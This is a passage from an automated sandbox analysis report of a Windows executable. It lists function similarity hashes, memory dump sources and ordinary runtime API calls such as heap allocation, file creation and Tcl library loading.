• Opcode Fuzzy Hash: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
• Instruction Fuzzy Hash: DA01D833610518BBCB059B99DC45DAE3B29DBC5330B340248F952971D1EA74EE41B750
APIs
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: DeleteErrorFileLast__dosmaperr
• String ID:
• API String ID: 1545401867-0
• Opcode ID: b24f01813a618321da0e741e1eef1aefe3d8761d1631a537e620f0965bca4775
• Instruction ID: 18a8b2e30c9783e7a95101a8ebf6dcacd5fef14d15b700ce70444c4cd6b8b048
• Opcode Fuzzy Hash: b24f01813a618321da0e741e1eef1aefe3d8761d1631a537e620f0965bca4775
• Instruction Fuzzy Hash: 81D0123250825C7B8F102BF5BD098177B5D9B803797140665FA3CC54A0EE35CAD0B551
APIs
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: DirectoryErrorLastRemove__dosmaperr
• String ID:
• API String ID: 4061612599-0
• Opcode ID: 6c33a79fcf4f3ecaf10a6158a32c432eea0fa7ead880a7e4e351e019804ece17
• Instruction ID: bc3f5f78d97fb18341b9472c24dbc48779b83f0f0ebfcadf0163253676f1f3cc
• Opcode Fuzzy Hash: 6c33a79fcf4f3ecaf10a6158a32c432eea0fa7ead880a7e4e351e019804ece17
• Instruction Fuzzy Hash: A3D0123250420C778F002BF6BC098177F5C9B817797240651F62CC51E0FE75CA90F551
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
• Instruction ID: d83dc877b67e1c5f115108f63999c206d2d7de3ed9e3405fb0ce5b1450cdb9ff
• Opcode Fuzzy Hash: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
• Instruction Fuzzy Hash: A8210A32D00218BBEB156B689C46B9F37689F4237BF110361FE282B1D1D7745F0AB661
APIs
• _free.LIBCMT ref: 00F68F25
• _free.LIBCMT ref: 00F68F54
  • Part of subcall function 00F63002: IsProcessorFeaturePresent.KERNEL32(00000017,00F66310,?,?,?,00F5C00A,?,?,?), ref: 00F6301E
  • Part of subcall function 00F63B43: IsProcessorFeaturePresent.KERNEL32(00000017,00F63B32,?,?,?,00F5C00A,?,?,?,00F63B3F,00000000,00000000,00000000,00000000,00000000,00F60DAF), ref: 00F63B45
  • Part of subcall function 00F63B43: GetCurrentProcess.KERNEL32(C0000417,?,?), ref: 00F63B68
  • Part of subcall function 00F63B43: TerminateProcess.KERNEL32(00000000,?,?), ref: 00F63B6F
Memory Dump Source
• Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
• String ID:
• API String ID: 1729132349-0
• Opcode ID: 441ab995d3c5caf028862ac26d7383f3f313465e48e2e461208a5307e5e935de
• Instruction ID: a41578ee7816f8ae14b1c5ee55acb9d6c29581c8e0ef8f381aeb53bb3a751986
• Opcode Fuzzy Hash: 441ab995d3c5caf028862ac26d7383f3f313465e48e2e461208a5307e5e935de
• Instruction Fuzzy Hash: BB21F676A04201ABDF289FA8CC41A7AB7AADF94754B28826CE905C7105FB72DD42E710
                                                                                                                      APIs
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1707611234-0
                                                                                                                      • Opcode ID: 5e2cdabac6e38a3707160d2a36151df2deffaec7139b2f7b059ccfe555783e28
                                                                                                                      • Instruction ID: 5f6e0dac4d4abf261634e50b92306f4d84aac1ac4468647992b2ef7bcfa1738a
                                                                                                                      • Opcode Fuzzy Hash: 5e2cdabac6e38a3707160d2a36151df2deffaec7139b2f7b059ccfe555783e28
                                                                                                                      • Instruction Fuzzy Hash: 40016961A00108AACB10DB9ACD04BBFB3FCAB4C711F604151F955E60C0EA78DE90E731
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction ID: 66cdf32264a3599041b57c3d7030ed707ed2f402daca8f1a3faeac4a5d9ac512
                                                                                                                      • Opcode Fuzzy Hash: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction Fuzzy Hash: 2B410375E00208AFDB14DF58CC81AA97BB2FB89364F2C8168F8499B351D771DE42EB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      • Opcode ID: bcf2554fb0783684e5168670dd69d47ebba68a10aac5036646c0b279e9b13442
                                                                                                                      • Instruction ID: f97fec9e9f030ba093166362ebcd9374224453f0d446ef39276d318ccc1e00ff
                                                                                                                      • Opcode Fuzzy Hash: bcf2554fb0783684e5168670dd69d47ebba68a10aac5036646c0b279e9b13442
                                                                                                                      • Instruction Fuzzy Hash: D0410972E0470157D7208A288C4171BBB92AF9533AFA94724FEB4D33C5EB25EC8D5292
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction ID: d33b6fc810dc9a0516b7e832264c5b719ef5d9e796f19fcaff3039d439cc8d82
                                                                                                                      • Opcode Fuzzy Hash: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction Fuzzy Hash: BD0128377083195F9F11AE6DED50AAB3396EBC53383248120FA14CB158EA30C801BB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 91ea42b288042c1d6eea06cba602b4fbfa602196ec093dd552887068233722f2
                                                                                                                      • Instruction ID: 2d79281d3b0fe42ce6dd1f4e422fa2f12d739a569e18cfeca0a449173623daec
                                                                                                                      • Opcode Fuzzy Hash: 91ea42b288042c1d6eea06cba602b4fbfa602196ec093dd552887068233722f2
                                                                                                                      • Instruction Fuzzy Hash: 340126379086186ADA261A69BC02BBB33A9CF83770F30432AF428871D1CF744941B790
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wsopen_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3347428461-0
                                                                                                                      • Opcode ID: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction ID: b47e434e2d21b111a8465f1b092a3887b98e016366cb9959fc3150357e01a7d9
                                                                                                                      • Opcode Fuzzy Hash: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction Fuzzy Hash: A3115AB1A0010AAFCF05DF58E94199F7BF4EF48304F044069F804EB251DA30DA12DB64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction ID: 100c7452f0deb6b0d23e240a3caaaeb17fbaae67ae8569e991c19c1506b6a2a0
                                                                                                                      • Opcode Fuzzy Hash: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction Fuzzy Hash: C9F0FC32901E145AD7213B6ADC05B5B36E88F81376F140755FE38931D1CB7DE90ABBA1
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F663F6,00000001,00000364,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F67065
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction ID: dfc755ca9c7628ede7eaa05474e3197fa3aad0c210fd61459e14adb2f4c8c4f3
                                                                                                                      • Opcode Fuzzy Hash: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction Fuzzy Hash: F8F0BE32A08329B6EB317B629C15B6B37589B817B8B244121FC08AA1C0CB24D841B6F0
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F60F97,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F65BD4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction ID: fc02fb2bba9634e03361d370ad02d32b42a880e516708c6aca3ca04088f08efa
                                                                                                                      • Opcode Fuzzy Hash: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction Fuzzy Hash: 53E0E531904A3857E62126629C01B5E36589BC2BF0F590021EC08B20C0DF50DC0072E5
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F63EF0
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction ID: 68d517dbbbab155f516ebd410f7eab8e7d3e5845cae8cc1f0d9716a8d14d35cf
                                                                                                                      • Opcode Fuzzy Hash: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction Fuzzy Hash: B4F06D375502059F8724CE6CD900A82BBE4EF993217108529E89DD3220D330F912CB80
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction ID: f10a66afa7e949adf7d90b9b5c31a54a8b797fbcd415b6d70d92198432e69040
                                                                                                                      • Opcode Fuzzy Hash: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction Fuzzy Hash: F6D06C3210010DBBDF028F84DC06EDA3BAAFB4C714F018000FA5856020C772E961EB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F5E378
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction ID: 2de662f20f6b9d75b6e0769f2c72da5dfc320ee6b1c78629d1e5ea01de47a5b6
                                                                                                                      • Opcode Fuzzy Hash: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction Fuzzy Hash: 97C04C71500248BBDB059B45D907E5E7BB9DB80364F204054F41557261DBB5EF44A690
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000064,?), ref: 00F5657F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 5d037b7396cf98bd72f949f132a1c114faf31c8eb87b27607e9f51cac269a884
                                                                                                                      • Instruction ID: 83793a0b79842f7b78785cada9dd7548e86e8ab0253ec17c622fd13013a9f867
                                                                                                                      • Opcode Fuzzy Hash: 5d037b7396cf98bd72f949f132a1c114faf31c8eb87b27607e9f51cac269a884
                                                                                                                      • Instruction Fuzzy Hash: F8310662A0024556EB24EF20CC017FB73A6EFA4765FC84925EE56C7209F772DA48E261
                                                                                                                      APIs
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_CreateInterp), ref: 00F552AB
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ErrorLast
